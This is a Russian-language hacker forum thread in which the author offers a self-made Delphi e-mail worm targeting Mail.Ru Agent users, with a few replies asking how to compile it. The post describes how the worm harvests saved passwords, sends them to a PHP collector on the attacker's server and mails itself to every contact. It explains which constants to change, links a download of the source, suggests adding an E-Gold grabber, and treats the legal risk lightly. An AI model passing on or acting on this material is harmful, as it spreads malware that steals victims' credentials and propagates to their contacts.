Эта идея витала в моих мозгах (да, да, они все таки есть!!! =) ) уже давно, реализовать я ее решил под впечатлением от статьи _1nf3ct0r_ "Вирусы, изменившие мир", а заключается она в написании E-Mail червя. Как жертву я выбрал весьма популярный пейджер Mail.Ru Agent (кхм, кхм я например на понимаю причины его популярности, как пейджер ему никогда не затмить ICQ, как почтовый клиент он ваще полный ацтой). По идее можно создать просто разможающегося и ничего не делающего червя, но это не интересено =)), у нас он будет еще собирать сохраненные (!) пассы от все того же многострадального Mail.Ru Agent'a. Так как я не пишу статью, а просто выкладываю уже сделанный "инструмент", то тех. реализацию описывать не буду, только рассказ о настройке ворма =). Итак, сам червь я сделал на Delphi (если кому интересно, то на 7 =) ), ничего дополнительно ставить не надо, достаточно иметь Делфи. Перед компиляцией необходимо изменить константы Server_Addr и Script_Name на адрес своего сервера и имя скрипта (Сейчас расскажу зачем). Как уже упоминалось нам нужен сервант, и не просто сервант, а сервант с php =). Туда мы зальем сниффер, на который будут передавться пароли и e-mail'ы жертв (ведь мы же делаем e-mail червя, не забыл? =) ). Сниффер будет писать пассы в лог а также рассылать ворма по всем известным контактам, откуда мы потом их и возьмем (лог не находится в открытом доступе и без знания пароля его не возьмешь =) ). Ну вот, надеюсь объяснил все понятно и доходчиво =))). В качестве вывода можно сделать схемку: -Мейл-червь, ориентированый на распространение среди пользователей @mail.ru -Отсылаем его кому нибудь, с кого начнется цепь -Чел скачивает, запускает... -После этого червь начинает рассылать себя всем по контакт листу и тянет пароли от м-агента -Идет цепная реакция На эту платформу кроме утягиванию паролей от Агента можно поставить любые другие возможности, вплоть до Е-Голд граббера =)) (впрочем сомневаюсь, что у людей у которых стоит Mail.Ru Agent имеется хотя бы акк на еголде =) ). Исходники сниффера и червя качаем тута: http://ggg123321.narod.ru/mraw0rm.rar. Теперь пару слов о законности, согласно УК РФ мы с тобой совершаем настоящее преступление =), конечно за то что ты возьмешь пару-тройку мыльниц тебе ничего не будет (на тебя даже вряд ли заявят, не говоря уже о том что искать 100 % не будут), но если ты по моему доброму совету приколбасишь туда нечто типа Е-Голд граббера и не позаботишься о своей анонимности, то есть шанс реально сесть =(. Копирайты на червяка принадлежат мне (А®ТеS'у), своему детищу я даю имя Варлок_12000, единственное что ты не имеешь права делать это продавать программу =) На этой веселой ноте я позволю себе откланятся, до новых встреч =)). З.Ы. Все вопросы задаем в теме, предложения можно в теме или в асю 903-521 (предложения типа "написать кульный WM трой" не рассматриваются заранее).
Можешь привести пример Server_Addr и Script_Name, а то чёт непойму. Блин, а без Дельфи никак не скомпилить?
А при чём тут уязвимости е-майл? Это в раздел про вирусы надо... А зачем копирайты АЧата? АЧат подставить решил?
копирайты исправил. -faraon2005ramses- - смотри внимательно сорец, все будет ясно =), без делфей никак.
